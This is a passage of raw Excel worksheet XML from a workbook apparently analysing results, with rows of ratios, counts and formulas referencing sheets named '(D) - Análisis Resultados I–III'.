      <c r="AD14" s="814" t="str">
        <f>'(D) - Análisis Resultados I - S'!ET50</f>
        <v>-</v>
      </c>
      <c r="AE14" s="69">
        <f>'(D) - Análisis Resultados II - '!DH10</f>
        <v>0</v>
      </c>
      <c r="AF14" s="306">
        <f>'(D) - Análisis Resultados III -'!DI10</f>
        <v>0</v>
      </c>
      <c r="AH14" s="804" t="s">
        <v>2013</v>
      </c>
      <c r="AI14" s="417" t="str">
        <f>'(D) - Análisis Resultados I - S'!EP50</f>
        <v>-</v>
      </c>
      <c r="AJ14" s="69">
        <f>'(D) - Análisis Resultados II - '!DF10</f>
        <v>1</v>
      </c>
      <c r="AK14" s="306">
        <f>'(D) - Análisis Resultados III -'!DG10</f>
        <v>1</v>
      </c>
      <c r="AR14" s="700" t="s">
        <v>2741</v>
      </c>
      <c r="AS14" s="690">
        <v>0.008018327605956471</v>
      </c>
      <c r="AT14" s="690">
        <v>0.0220112214069918</v>
      </c>
      <c r="AU14" s="690">
        <v>0.9586776859504132</v>
      </c>
      <c r="AV14" s="690">
        <v>0.08333333333333333</v>
      </c>
      <c r="AW14" s="690">
        <v>1.0640259906081972E-5</v>
      </c>
      <c r="AX14" s="690">
        <v>0.3333333333333333</v>
      </c>
      <c r="AY14" s="690">
        <v>5.269890458345345E-4</v>
      </c>
      <c r="AZ14" s="690">
        <v>0.02097902097902098</v>
      </c>
      <c r="BA14" s="690">
        <v>0.2777777777777778</v>
      </c>
      <c r="BB14" s="690">
        <v>0.5714285714285714</v>
      </c>
      <c r="BC14" s="690">
        <v>0.002558271745309835</v>
      </c>
      <c r="BD14" s="690">
        <v>0.0</v>
      </c>
      <c r="BE14" s="614">
        <v>0.006493506493506494</v>
      </c>
      <c r="BI14" s="653" t="s">
        <v>2742</v>
      </c>
      <c r="BJ14" s="336">
        <v>0.2226040473463154</v>
      </c>
      <c r="BK14" s="336">
        <v>0.9997122716155948</v>
      </c>
      <c r="BL14" s="336">
        <v>0.9256198347107438</v>
      </c>
      <c r="BM14" s="336">
        <v>0.16666666666666666</v>
      </c>
      <c r="BN14" s="336">
        <v>0.008891710528182502</v>
      </c>
      <c r="BO14" s="336">
        <v>0.0</v>
      </c>
      <c r="BP14" s="336">
        <v>0.15416906889593543</v>
      </c>
      <c r="BQ14" s="336">
        <v>0.02097902097902098</v>
      </c>
      <c r="BR14" s="336">
        <v>0.1111111111111111</v>
      </c>
      <c r="BS14" s="336">
        <v>0.5714285714285714</v>
      </c>
      <c r="BT14" s="336">
        <v>0.002498429131384459</v>
      </c>
      <c r="BU14" s="336">
        <v>0.0</v>
      </c>
      <c r="BV14" s="337">
        <v>0.0021645021645021645</v>
      </c>
      <c r="BZ14" s="797"/>
      <c r="CA14" s="797"/>
      <c r="CB14" s="797"/>
      <c r="CC14" s="797"/>
      <c r="CD14" s="797"/>
      <c r="CE14" s="797"/>
      <c r="CF14" s="797"/>
    </row>
    <row r="15" ht="60.0" customHeight="1">
      <c r="B15" s="806"/>
      <c r="C15" s="807"/>
      <c r="D15" s="808"/>
      <c r="E15" s="808"/>
      <c r="F15" s="808"/>
      <c r="G15" s="808"/>
      <c r="H15" s="809"/>
      <c r="I15" s="806"/>
      <c r="K15" s="789"/>
      <c r="L15" s="789"/>
      <c r="M15" s="789"/>
      <c r="N15" s="789"/>
      <c r="O15" s="789"/>
      <c r="P15" s="789"/>
      <c r="Q15" s="785"/>
      <c r="AC15" s="804" t="s">
        <v>951</v>
      </c>
      <c r="AD15" s="306">
        <f>'(D) - Análisis Resultados I - S'!ET51</f>
        <v>0.875</v>
      </c>
      <c r="AE15" s="69">
        <f>'(D) - Análisis Resultados II - '!DH11</f>
        <v>0</v>
      </c>
      <c r="AF15" s="306">
        <f>'(D) - Análisis Resultados III -'!DI11</f>
        <v>0.25</v>
      </c>
      <c r="AH15" s="804" t="s">
        <v>951</v>
      </c>
      <c r="AI15" s="69">
        <f>'(D) - Análisis Resultados I - S'!EP51</f>
        <v>0.3617021277</v>
      </c>
      <c r="AJ15" s="69">
        <f>'(D) - Análisis Resultados II - '!DF11</f>
        <v>1</v>
      </c>
      <c r="AK15" s="306">
        <f>'(D) - Análisis Resultados III -'!DG11</f>
        <v>0.75</v>
      </c>
      <c r="AR15" s="489" t="s">
        <v>2743</v>
      </c>
      <c r="AS15" s="756">
        <f t="shared" ref="AS15:BE15" si="1">AS21/AS19</f>
        <v>0.009545628102</v>
      </c>
      <c r="AT15" s="756">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="AU15" s="756">
        <f t="shared" si="1"/>
        <v>0.8925619835</v>
      </c>
      <c r="AV15" s="756">
        <f t="shared" si="1"/>
        <v>0.8333333333</v>
      </c>
      <c r="AW15" s="756">
        <f t="shared" si="1"/>
        <v>0.05007660987</v>
      </c>
      <c r="AX15" s="756">
        <f t="shared" si="1"/>
        <v>0.3333333333</v>
      </c>
      <c r="AY15" s="756">
        <f t="shared" si="1"/>
        <v>0.009075922456</v>
      </c>
      <c r="AZ15" s="756">
        <f t="shared" si="1"/>
        <v>0.986013986</v>
      </c>
      <c r="BA15" s="756">
        <f t="shared" si="1"/>
        <v>0.6666666667</v>
      </c>
      <c r="BB15" s="756">
        <f t="shared" si="1"/>
        <v>0.7142857143</v>
      </c>
      <c r="BC15" s="756">
        <f t="shared" si="1"/>
        <v>0.00008976392089</v>
      </c>
      <c r="BD15" s="756">
        <f t="shared" si="1"/>
        <v>0.5</v>
      </c>
      <c r="BE15" s="756">
        <f t="shared" si="1"/>
        <v>0.9978354978</v>
      </c>
      <c r="BI15" s="700" t="s">
        <v>2743</v>
      </c>
      <c r="BJ15" s="690">
        <f t="shared" ref="BJ15:BV15" si="2">BJ21/BJ19</f>
        <v>0.009545628102</v>
      </c>
      <c r="BK15" s="690">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="BL15" s="690">
        <f t="shared" si="2"/>
        <v>0.8925619835</v>
      </c>
      <c r="BM15" s="690">
        <f t="shared" si="2"/>
        <v>0.8333333333</v>
      </c>
      <c r="BN15" s="690">
        <f t="shared" si="2"/>
        <v>0.05007660987</v>
      </c>
      <c r="BO15" s="690">
        <f t="shared" si="2"/>
        <v>0.3333333333</v>
      </c>
      <c r="BP15" s="690">
        <f t="shared" si="2"/>
        <v>0.009075922456</v>
      </c>
      <c r="BQ15" s="690">
        <f t="shared" si="2"/>
        <v>0.986013986</v>
      </c>
      <c r="BR15" s="690">
        <f t="shared" si="2"/>
        <v>0.6666666667</v>
      </c>
      <c r="BS15" s="690">
        <f t="shared" si="2"/>
        <v>0.7142857143</v>
      </c>
      <c r="BT15" s="690">
        <f t="shared" si="2"/>
        <v>0.00008976392089</v>
      </c>
      <c r="BU15" s="690">
        <f t="shared" si="2"/>
        <v>0.5</v>
      </c>
      <c r="BV15" s="690">
        <f t="shared" si="2"/>
        <v>0.9978354978</v>
      </c>
      <c r="BZ15" s="797"/>
      <c r="CA15" s="815"/>
      <c r="CB15" s="815"/>
      <c r="CC15" s="815"/>
      <c r="CD15" s="815"/>
      <c r="CE15" s="815"/>
      <c r="CF15" s="815"/>
    </row>
    <row r="16" ht="18.75" customHeight="1">
      <c r="B16" s="806"/>
      <c r="C16" s="807"/>
      <c r="D16" s="816" t="s">
        <v>2448</v>
      </c>
      <c r="E16" s="817" t="s">
        <v>2744</v>
      </c>
      <c r="F16" s="818" t="s">
        <v>2745</v>
      </c>
      <c r="G16" s="819" t="s">
        <v>2746</v>
      </c>
      <c r="H16" s="820"/>
      <c r="I16" s="821"/>
      <c r="K16" s="789"/>
      <c r="L16" s="789"/>
      <c r="M16" s="789"/>
      <c r="N16" s="789"/>
      <c r="O16" s="789"/>
      <c r="P16" s="789"/>
      <c r="Q16" s="785"/>
      <c r="AC16" s="804" t="s">
        <v>633</v>
      </c>
      <c r="AD16" s="306">
        <f>'(D) - Análisis Resultados I - S'!ET52</f>
        <v>1</v>
      </c>
      <c r="AE16" s="69">
        <f>'(D) - Análisis Resultados II - '!DH12</f>
        <v>0</v>
      </c>
      <c r="AF16" s="306">
        <f>'(D) - Análisis Resultados III -'!DI12</f>
        <v>0</v>
      </c>
      <c r="AH16" s="804" t="s">
        <v>633</v>
      </c>
      <c r="AI16" s="69">
        <f>'(D) - Análisis Resultados I - S'!EP52</f>
        <v>0.2857142857</v>
      </c>
      <c r="AJ16" s="69">
        <f>'(D) - Análisis Resultados II - '!DF12</f>
        <v>1</v>
      </c>
      <c r="AK16" s="306">
        <f>'(D) - Análisis Resultados III -'!DG12</f>
        <v>1</v>
      </c>
      <c r="AR16" s="36"/>
      <c r="AS16" s="36"/>
      <c r="AT16" s="36"/>
      <c r="AU16" s="36"/>
      <c r="AV16" s="36"/>
      <c r="AW16" s="36"/>
      <c r="AX16" s="36"/>
      <c r="AY16" s="36"/>
      <c r="AZ16" s="36"/>
      <c r="BA16" s="36"/>
      <c r="BB16" s="36"/>
      <c r="BC16" s="36"/>
      <c r="BD16" s="36"/>
      <c r="BE16" s="36"/>
      <c r="BZ16" s="797"/>
      <c r="CA16" s="815"/>
      <c r="CB16" s="815"/>
      <c r="CC16" s="815"/>
      <c r="CD16" s="815"/>
      <c r="CE16" s="815"/>
      <c r="CF16" s="815"/>
    </row>
    <row r="17" ht="18.75" customHeight="1">
      <c r="B17" s="806"/>
      <c r="C17" s="807"/>
      <c r="D17" s="822" t="s">
        <v>2093</v>
      </c>
      <c r="E17" s="823">
        <v>4.0</v>
      </c>
      <c r="F17" s="824">
        <v>5.0</v>
      </c>
      <c r="G17" s="825">
        <v>6.0</v>
      </c>
      <c r="H17" s="820"/>
      <c r="I17" s="821"/>
      <c r="K17" s="785"/>
      <c r="L17" s="785"/>
      <c r="M17" s="785"/>
      <c r="N17" s="785"/>
      <c r="O17" s="785"/>
      <c r="P17" s="785"/>
      <c r="Q17" s="785"/>
      <c r="AC17" s="804" t="s">
        <v>244</v>
      </c>
      <c r="AD17" s="306">
        <f>'(D) - Análisis Resultados I - S'!ET54</f>
        <v>1</v>
      </c>
      <c r="AE17" s="417" t="str">
        <f>'(D) - Análisis Resultados II - '!DH14</f>
        <v>-</v>
      </c>
      <c r="AF17" s="306">
        <f>'(D) - Análisis Resultados III -'!DI14</f>
        <v>0.4166666667</v>
      </c>
      <c r="AH17" s="804" t="s">
        <v>244</v>
      </c>
      <c r="AI17" s="69">
        <f>'(D) - Análisis Resultados I - S'!EP54</f>
        <v>0.09677419355</v>
      </c>
      <c r="AJ17" s="69" t="str">
        <f>'(D) - Análisis Resultados II - '!DF14</f>
        <v>-</v>
      </c>
      <c r="AK17" s="306">
        <f>'(D) - Análisis Resultados III -'!DG14</f>
        <v>0.5833333333</v>
      </c>
      <c r="AR17" s="697" t="s">
        <v>2632</v>
      </c>
      <c r="AS17" s="2"/>
      <c r="AT17" s="2"/>
      <c r="AU17" s="2"/>
      <c r="AV17" s="2"/>
      <c r="AW17" s="2"/>
      <c r="AX17" s="2"/>
      <c r="AY17" s="2"/>
      <c r="AZ17" s="2"/>
      <c r="BA17" s="2"/>
      <c r="BB17" s="2"/>
      <c r="BC17" s="2"/>
      <c r="BD17" s="2"/>
      <c r="BE17" s="3"/>
      <c r="BI17" s="697" t="s">
        <v>2632</v>
      </c>
      <c r="BJ17" s="2"/>
      <c r="BK17" s="2"/>
      <c r="BL17" s="2"/>
      <c r="BM17" s="2"/>
      <c r="BN17" s="2"/>
      <c r="BO17" s="2"/>
      <c r="BP17" s="2"/>
      <c r="BQ17" s="2"/>
      <c r="BR17" s="2"/>
      <c r="BS17" s="2"/>
      <c r="BT17" s="2"/>
      <c r="BU17" s="2"/>
      <c r="BV17" s="3"/>
    </row>
    <row r="18" ht="45.75" customHeight="1">
      <c r="B18" s="806"/>
      <c r="C18" s="807"/>
      <c r="D18" s="822" t="s">
        <v>2013</v>
      </c>
      <c r="E18" s="823">
        <v>2.0</v>
      </c>
      <c r="F18" s="824">
        <v>4.0</v>
      </c>
      <c r="G18" s="825">
        <v>5.0</v>
      </c>
      <c r="H18" s="820"/>
      <c r="I18" s="821"/>
      <c r="K18" s="785"/>
      <c r="L18" s="785"/>
      <c r="M18" s="785"/>
      <c r="N18" s="785"/>
      <c r="O18" s="785"/>
      <c r="P18" s="785"/>
      <c r="Q18" s="785"/>
      <c r="AC18" s="804" t="s">
        <v>427</v>
      </c>
      <c r="AD18" s="306">
        <f>'(D) - Análisis Resultados I - S'!ET55</f>
        <v>1</v>
      </c>
      <c r="AE18" s="417" t="str">
        <f>'(D) - Análisis Resultados II - '!DH15</f>
        <v>-</v>
      </c>
      <c r="AF18" s="306">
        <f>'(D) - Análisis Resultados III -'!DI15</f>
        <v>1</v>
      </c>
      <c r="AH18" s="804" t="s">
        <v>427</v>
      </c>
      <c r="AI18" s="69">
        <f>'(D) - Análisis Resultados I - S'!EP55</f>
        <v>0</v>
      </c>
      <c r="AJ18" s="69" t="str">
        <f>'(D) - Análisis Resultados II - '!DF15</f>
        <v>-</v>
      </c>
      <c r="AK18" s="306">
        <f>'(D) - Análisis Resultados III -'!DG15</f>
        <v>0</v>
      </c>
      <c r="AR18" s="653" t="s">
        <v>2447</v>
      </c>
      <c r="AS18" s="698" t="s">
        <v>2093</v>
      </c>
      <c r="AT18" s="698" t="s">
        <v>2013</v>
      </c>
      <c r="AU18" s="698" t="s">
        <v>951</v>
      </c>
      <c r="AV18" s="698" t="s">
        <v>633</v>
      </c>
      <c r="AW18" s="698" t="s">
        <v>244</v>
      </c>
      <c r="AX18" s="698" t="s">
        <v>427</v>
      </c>
      <c r="AY18" s="698" t="s">
        <v>1373</v>
      </c>
      <c r="AZ18" s="698" t="s">
        <v>209</v>
      </c>
      <c r="BA18" s="698" t="s">
        <v>664</v>
      </c>
      <c r="BB18" s="698" t="s">
        <v>357</v>
      </c>
      <c r="BC18" s="698" t="s">
        <v>310</v>
      </c>
      <c r="BD18" s="698" t="s">
        <v>292</v>
      </c>
      <c r="BE18" s="699" t="s">
        <v>558</v>
      </c>
      <c r="BI18" s="653" t="s">
        <v>2447</v>
      </c>
      <c r="BJ18" s="698" t="s">
        <v>2093</v>
      </c>
      <c r="BK18" s="698" t="s">
        <v>2013</v>
      </c>
      <c r="BL18" s="698" t="s">
        <v>951</v>
      </c>
      <c r="BM18" s="698" t="s">
        <v>633</v>
      </c>
      <c r="BN18" s="698" t="s">
        <v>244</v>
      </c>
      <c r="BO18" s="698" t="s">
        <v>427</v>
      </c>
      <c r="BP18" s="698" t="s">
        <v>1373</v>
      </c>
      <c r="BQ18" s="698" t="s">
        <v>209</v>
      </c>
      <c r="BR18" s="698" t="s">
        <v>664</v>
      </c>
      <c r="BS18" s="698" t="s">
        <v>357</v>
      </c>
      <c r="BT18" s="698" t="s">
        <v>310</v>
      </c>
      <c r="BU18" s="698" t="s">
        <v>292</v>
      </c>
      <c r="BV18" s="699" t="s">
        <v>558</v>
      </c>
    </row>
    <row r="19" ht="44.25" customHeight="1">
      <c r="B19" s="806"/>
      <c r="C19" s="807"/>
      <c r="D19" s="822" t="s">
        <v>951</v>
      </c>
      <c r="E19" s="823">
        <v>7.0</v>
      </c>
      <c r="F19" s="824">
        <v>8.0</v>
      </c>
      <c r="G19" s="825">
        <v>12.0</v>
      </c>
      <c r="H19" s="820"/>
      <c r="I19" s="821"/>
      <c r="K19" s="785"/>
      <c r="L19" s="785"/>
      <c r="M19" s="785"/>
      <c r="N19" s="785"/>
      <c r="O19" s="785"/>
      <c r="P19" s="785"/>
      <c r="Q19" s="785"/>
      <c r="AC19" s="804" t="s">
        <v>1373</v>
      </c>
      <c r="AD19" s="306">
        <f>'(D) - Análisis Resultados I - S'!ET56</f>
        <v>0.7777777778</v>
      </c>
      <c r="AE19" s="69">
        <f>'(D) - Análisis Resultados II - '!DH16</f>
        <v>0</v>
      </c>
      <c r="AF19" s="306">
        <f>'(D) - Análisis Resultados III -'!DI16</f>
        <v>0.3333333333</v>
      </c>
      <c r="AH19" s="804" t="s">
        <v>1373</v>
      </c>
      <c r="AI19" s="69">
        <f>'(D) - Análisis Resultados I - S'!EP56</f>
        <v>0.1011235955</v>
      </c>
      <c r="AJ19" s="69">
        <f>'(D) - Análisis Resultados II - '!DF16</f>
        <v>1</v>
      </c>
      <c r="AK19" s="306">
        <f>'(D) - Análisis Resultados III -'!DG16</f>
        <v>0.6666666667</v>
      </c>
      <c r="AR19" s="653" t="s">
        <v>2464</v>
      </c>
      <c r="AS19" s="36">
        <v>2619.0</v>
      </c>
      <c r="AT19" s="36">
        <v>6951.0</v>
      </c>
      <c r="AU19" s="36">
        <v>121.0</v>
      </c>
      <c r="AV19" s="36">
        <v>12.0</v>
      </c>
      <c r="AW19" s="36">
        <v>281948.0</v>
      </c>
      <c r="AX19" s="36">
        <v>3.0</v>
      </c>
      <c r="AY19" s="36">
        <v>666048.0</v>
      </c>
      <c r="AZ19" s="36">
        <v>143.0</v>
      </c>
      <c r="BA19" s="36">
        <v>18.0</v>
      </c>
      <c r="BB19" s="36">
        <v>7.0</v>
      </c>
      <c r="BC19" s="36">
        <v>66842.0</v>
      </c>
      <c r="BD19" s="36">
        <v>2.0</v>
      </c>
      <c r="BE19" s="826">
        <v>462.0</v>
      </c>
      <c r="BI19" s="653" t="s">
        <v>2464</v>
      </c>
      <c r="BJ19" s="173">
        <v>2619.0</v>
      </c>
      <c r="BK19" s="173">
        <v>6951.0</v>
      </c>
      <c r="BL19" s="173">
        <v>121.0</v>
      </c>
      <c r="BM19" s="173">
        <v>12.0</v>
      </c>
      <c r="BN19" s="173">
        <v>281948.0</v>
      </c>
      <c r="BO19" s="173">
        <v>3.0</v>
      </c>
      <c r="BP19" s="173">
        <v>666048.0</v>
      </c>
      <c r="BQ19" s="173">
        <v>143.0</v>
      </c>
      <c r="BR19" s="173">
        <v>18.0</v>
      </c>
      <c r="BS19" s="173">
        <v>7.0</v>
      </c>
      <c r="BT19" s="173">
        <v>66842.0</v>
      </c>
      <c r="BU19" s="173">
        <v>2.0</v>
      </c>
      <c r="BV19" s="827">
        <v>462.0</v>
      </c>
    </row>
    <row r="20" ht="49.5" customHeight="1">
      <c r="B20" s="806"/>
      <c r="C20" s="807"/>
      <c r="D20" s="828" t="s">
        <v>558</v>
      </c>
      <c r="E20" s="824">
        <v>4.0</v>
      </c>
      <c r="F20" s="824">
        <v>4.0</v>
      </c>
      <c r="G20" s="825">
        <v>4.0</v>
      </c>
      <c r="H20" s="820"/>
      <c r="I20" s="821"/>
      <c r="K20" s="785"/>
      <c r="L20" s="785"/>
      <c r="M20" s="785"/>
      <c r="N20" s="785"/>
      <c r="O20" s="785"/>
      <c r="P20" s="785"/>
      <c r="Q20" s="785"/>
      <c r="AC20" s="804" t="s">
        <v>209</v>
      </c>
      <c r="AD20" s="306">
        <f>'(D) - Análisis Resultados I - S'!ET57</f>
        <v>1</v>
      </c>
      <c r="AE20" s="69">
        <f>'(D) - Análisis Resultados II - '!DH17</f>
        <v>0</v>
      </c>
      <c r="AF20" s="306">
        <f>'(D) - Análisis Resultados III -'!DI17</f>
        <v>0.5789473684</v>
      </c>
      <c r="AH20" s="804" t="s">
        <v>209</v>
      </c>
      <c r="AI20" s="69">
        <f>'(D) - Análisis Resultados I - S'!EP57</f>
        <v>0.1547619048</v>
      </c>
      <c r="AJ20" s="69">
        <f>'(D) - Análisis Resultados II - '!DF17</f>
        <v>1</v>
      </c>
      <c r="AK20" s="306">
        <f>'(D) - Análisis Resultados III -'!DG17</f>
        <v>0.4210526316</v>
      </c>
      <c r="AR20" s="653" t="s">
        <v>2661</v>
      </c>
      <c r="AS20" s="36">
        <v>21.0</v>
      </c>
      <c r="AT20" s="36">
        <v>153.0</v>
      </c>
      <c r="AU20" s="36">
        <v>116.0</v>
      </c>
      <c r="AV20" s="36">
        <v>1.0</v>
      </c>
      <c r="AW20" s="36">
        <v>3.0</v>
      </c>
      <c r="AX20" s="36">
        <v>1.0</v>
      </c>
      <c r="AY20" s="36">
        <v>351.0</v>
      </c>
      <c r="AZ20" s="36">
        <v>3.0</v>
      </c>
      <c r="BA20" s="36">
        <v>5.0</v>
      </c>
      <c r="BB20" s="36">
        <v>4.0</v>
      </c>
      <c r="BC20" s="36">
        <v>171.0</v>
      </c>
      <c r="BD20" s="36">
        <v>0.0</v>
      </c>
      <c r="BE20" s="826">
        <v>3.0</v>
      </c>
      <c r="BI20" s="700" t="s">
        <v>2747</v>
      </c>
      <c r="BJ20" s="755">
        <v>583.0</v>
      </c>
      <c r="BK20" s="755">
        <v>6949.0</v>
      </c>
      <c r="BL20" s="755">
        <v>112.0</v>
      </c>
      <c r="BM20" s="755">
        <v>2.0</v>
      </c>
      <c r="BN20" s="755">
        <v>2507.0</v>
      </c>
      <c r="BO20" s="755">
        <v>0.0</v>
      </c>
      <c r="BP20" s="755">
        <v>102684.0</v>
      </c>
      <c r="BQ20" s="755">
        <v>3.0</v>
      </c>
      <c r="BR20" s="755">
        <v>2.0</v>
      </c>
      <c r="BS20" s="755">
        <v>4.0</v>
      </c>
      <c r="BT20" s="755">
        <v>167.0</v>
      </c>
      <c r="BU20" s="755">
        <v>0.0</v>
      </c>
      <c r="BV20" s="829">
        <v>1.0</v>
      </c>
    </row>
    <row r="21" ht="38.25" customHeight="1">
      <c r="B21" s="806"/>
      <c r="C21" s="807"/>
      <c r="D21" s="828" t="s">
        <v>633</v>
      </c>
      <c r="E21" s="824">
        <v>8.0</v>
      </c>
      <c r="F21" s="824">
        <v>8.0</v>
      </c>
      <c r="G21" s="825">
        <v>8.0</v>
      </c>
      <c r="H21" s="820"/>
      <c r="I21" s="821"/>
      <c r="K21" s="785"/>
      <c r="L21" s="785"/>
      <c r="M21" s="785"/>
      <c r="N21" s="785"/>
      <c r="O21" s="785"/>
      <c r="P21" s="785"/>
      <c r="Q21" s="785"/>
      <c r="AC21" s="804" t="s">
        <v>664</v>
      </c>
      <c r="AD21" s="306">
        <f>'(D) - Análisis Resultados I - S'!ET58</f>
        <v>0.8</v>
      </c>
      <c r="AE21" s="417" t="str">
        <f>'(D) - Análisis Resultados II - '!DH18</f>
        <v>-</v>
      </c>
      <c r="AF21" s="306">
        <f>'(D) - Análisis Resultados III -'!DI18</f>
        <v>0.5909090909</v>
      </c>
      <c r="AH21" s="804" t="s">
        <v>664</v>
      </c>
      <c r="AI21" s="69">
        <f>'(D) - Análisis Resultados I - S'!EP58</f>
        <v>0.09230769231</v>
      </c>
      <c r="AJ21" s="69" t="str">
        <f>'(D) - Análisis Resultados II - '!DF18</f>
        <v>-</v>
      </c>
      <c r="AK21" s="306">
        <f>'(D) - Análisis Resultados III -'!DG18</f>
        <v>0.4090909091</v>
      </c>
      <c r="AR21" s="700" t="s">
        <v>2748</v>
      </c>
      <c r="AS21" s="755">
        <v>25.0</v>
      </c>
      <c r="AT21" s="755">
        <v>0.0</v>
      </c>
      <c r="AU21" s="755">
        <v>108.0</v>
      </c>
      <c r="AV21" s="755">
        <v>10.0</v>
      </c>
      <c r="AW21" s="755">
        <v>14119.0</v>
      </c>
      <c r="AX21" s="755">
        <v>1.0</v>
      </c>
      <c r="AY21" s="755">
        <v>6045.0</v>
      </c>
      <c r="AZ21" s="755">
        <v>141.0</v>
      </c>
      <c r="BA21" s="755">
        <v>12.0</v>
      </c>
      <c r="BB21" s="755">
        <v>5.0</v>
      </c>
      <c r="BC21" s="755">
        <v>6.0</v>
      </c>
      <c r="BD21" s="755">
        <v>1.0</v>
      </c>
      <c r="BE21" s="829">
        <v>461.0</v>
      </c>
      <c r="BI21" s="700" t="s">
        <v>2748</v>
      </c>
      <c r="BJ21" s="755">
        <v>25.0</v>
      </c>
      <c r="BK21" s="755">
        <v>0.0</v>
      </c>
      <c r="BL21" s="755">
        <v>108.0</v>
      </c>
      <c r="BM21" s="755">
        <v>10.0</v>
      </c>
      <c r="BN21" s="755">
        <v>14119.0</v>
      </c>
      <c r="BO21" s="755">
        <v>1.0</v>
      </c>
      <c r="BP21" s="755">
        <v>6045.0</v>
      </c>
      <c r="BQ21" s="755">
        <v>141.0</v>
      </c>
      <c r="BR21" s="755">
        <v>12.0</v>
      </c>
      <c r="BS21" s="755">
        <v>5.0</v>
      </c>
      <c r="BT21" s="755">
        <v>6.0</v>
      </c>
      <c r="BU21" s="755">
        <v>1.0</v>
      </c>
      <c r="BV21" s="829">
        <v>461.0</v>
      </c>
    </row>
    <row r="22" ht="18.75" customHeight="1">
      <c r="B22" s="806"/>
      <c r="C22" s="807"/>
      <c r="D22" s="828" t="s">
        <v>1725</v>
      </c>
      <c r="E22" s="824">
        <v>2.0</v>
      </c>
      <c r="F22" s="824">
        <v>2.0</v>
      </c>
      <c r="G22" s="825">
        <v>2.0</v>
      </c>
      <c r="H22" s="820"/>
      <c r="I22" s="821"/>
      <c r="AC22" s="804" t="s">
        <v>357</v>
      </c>
      <c r="AD22" s="306">
        <f>'(D) - Análisis Resultados I - S'!ET59</f>
        <v>0.6666666667</v>
      </c>
      <c r="AE22" s="69">
        <f>'(D) - Análisis Resultados II - '!DH19</f>
        <v>0</v>
      </c>
      <c r="AF22" s="306">
        <f>'(D) - Análisis Resultados III -'!DI19</f>
        <v>0.2</v>
      </c>
      <c r="AH22" s="804" t="s">
        <v>357</v>
      </c>
      <c r="AI22" s="69">
        <f>'(D) - Análisis Resultados I - S'!EP59</f>
        <v>0.1964285714</v>
      </c>
      <c r="AJ22" s="69">
        <f>'(D) - Análisis Resultados II - '!DF19</f>
        <v>1</v>
      </c>
      <c r="AK22" s="306">
        <f>'(D) - Análisis Resultados III -'!DG19</f>
        <v>0.8</v>
      </c>
    </row>
    <row r="23" ht="18.75" customHeight="1">
      <c r="B23" s="806"/>
      <c r="C23" s="807"/>
      <c r="D23" s="828" t="s">
        <v>664</v>
      </c>
      <c r="E23" s="824">
        <v>10.0</v>
      </c>
      <c r="F23" s="824">
        <v>10.0</v>
      </c>
      <c r="G23" s="825">
        <v>13.0</v>
      </c>
      <c r="H23" s="820"/>
      <c r="I23" s="821"/>
      <c r="AC23" s="804" t="s">
        <v>310</v>
      </c>
      <c r="AD23" s="306">
        <f>'(D) - Análisis Resultados I - S'!ET60</f>
        <v>1</v>
      </c>
      <c r="AE23" s="69">
        <f>'(D) - Análisis Resultados II - '!DH20</f>
        <v>0</v>
      </c>
      <c r="AF23" s="306">
        <f>'(D) - Análisis Resultados III -'!DI20</f>
        <v>0.03658536585</v>
      </c>
      <c r="AH23" s="804" t="s">
        <v>310</v>
      </c>
      <c r="AI23" s="69">
        <f>'(D) - Análisis Resultados I - S'!EP60</f>
        <v>0.2413793103</v>
      </c>
      <c r="AJ23" s="69">
        <f>'(D) - Análisis Resultados II - '!DF20</f>
        <v>1</v>
      </c>
      <c r="AK23" s="306">
        <f>'(D) - Análisis Resultados III -'!DG20</f>
        <v>0.9634146341</v>
      </c>
    </row>
    <row r="24" ht="18.75" customHeight="1">
      <c r="B24" s="806"/>
      <c r="C24" s="807"/>
      <c r="D24" s="828" t="s">
        <v>244</v>
      </c>
      <c r="E24" s="824">
        <v>4.0</v>
      </c>
      <c r="F24" s="824">
        <v>8.0</v>
      </c>
      <c r="G24" s="825">
        <v>20.0</v>
      </c>
      <c r="H24" s="820"/>
      <c r="I24" s="821"/>
      <c r="AC24" s="804" t="s">
        <v>292</v>
      </c>
      <c r="AD24" s="306">
        <f>'(D) - Análisis Resultados I - S'!ET61</f>
        <v>1</v>
      </c>
      <c r="AE24" s="417" t="str">
        <f>'(D) - Análisis Resultados II - '!DH21</f>
        <v>-</v>
      </c>
      <c r="AF24" s="814">
        <f>'(D) - Análisis Resultados III -'!DI21</f>
        <v>0</v>
      </c>
      <c r="AH24" s="804" t="s">
        <v>292</v>
      </c>
      <c r="AI24" s="69">
        <f>'(D) - Análisis Resultados I - S'!EP61</f>
        <v>0.06896551724</v>
      </c>
      <c r="AJ24" s="69" t="str">
        <f>'(D) - Análisis Resultados II - '!DF21</f>
        <v>-</v>
      </c>
      <c r="AK24" s="306" t="str">
        <f>'(D) - Análisis Resultados III -'!DG21</f>
        <v>-</v>
      </c>
    </row>
    <row r="25" ht="18.75" customHeight="1">
      <c r="B25" s="806"/>
      <c r="C25" s="807"/>
      <c r="D25" s="828" t="s">
        <v>310</v>
      </c>
      <c r="E25" s="824">
        <v>5.0</v>
      </c>
      <c r="F25" s="824">
        <v>5.0</v>
      </c>
      <c r="G25" s="825">
        <v>7.0</v>
      </c>
      <c r="H25" s="820"/>
      <c r="I25" s="821"/>
      <c r="AC25" s="830" t="s">
        <v>558</v>
      </c>
      <c r="AD25" s="415">
        <f>'(D) - Análisis Resultados I - S'!ET62</f>
        <v>0.5</v>
      </c>
      <c r="AE25" s="417" t="str">
        <f>'(D) - Análisis Resultados II - '!DH22</f>
        <v>-</v>
      </c>
      <c r="AF25" s="306">
        <f>'(D) - Análisis Resultados III -'!DI22</f>
        <v>0.07692307692</v>
      </c>
      <c r="AH25" s="830" t="s">
        <v>558</v>
      </c>
      <c r="AI25" s="69">
        <f>'(D) - Análisis Resultados I - S'!EP62</f>
        <v>0.125</v>
      </c>
      <c r="AJ25" s="69" t="str">
        <f>'(D) - Análisis Resultados II - '!DF22</f>
        <v>-</v>
      </c>
      <c r="AK25" s="306">
        <f>'(D) - Análisis Resultados III -'!DG22</f>
        <v>0.9230769231</v>
      </c>
    </row>
    <row r="26" ht="18.75" customHeight="1">
      <c r="B26" s="806"/>
      <c r="C26" s="807"/>
      <c r="D26" s="828" t="s">
        <v>357</v>
      </c>
      <c r="E26" s="824">
        <v>5.0</v>
      </c>
      <c r="F26" s="824">
        <v>6.0</v>
      </c>
      <c r="G26" s="825">
        <v>6.0</v>
      </c>
      <c r="H26" s="820"/>
      <c r="I26" s="821"/>
      <c r="AC26" s="753" t="s">
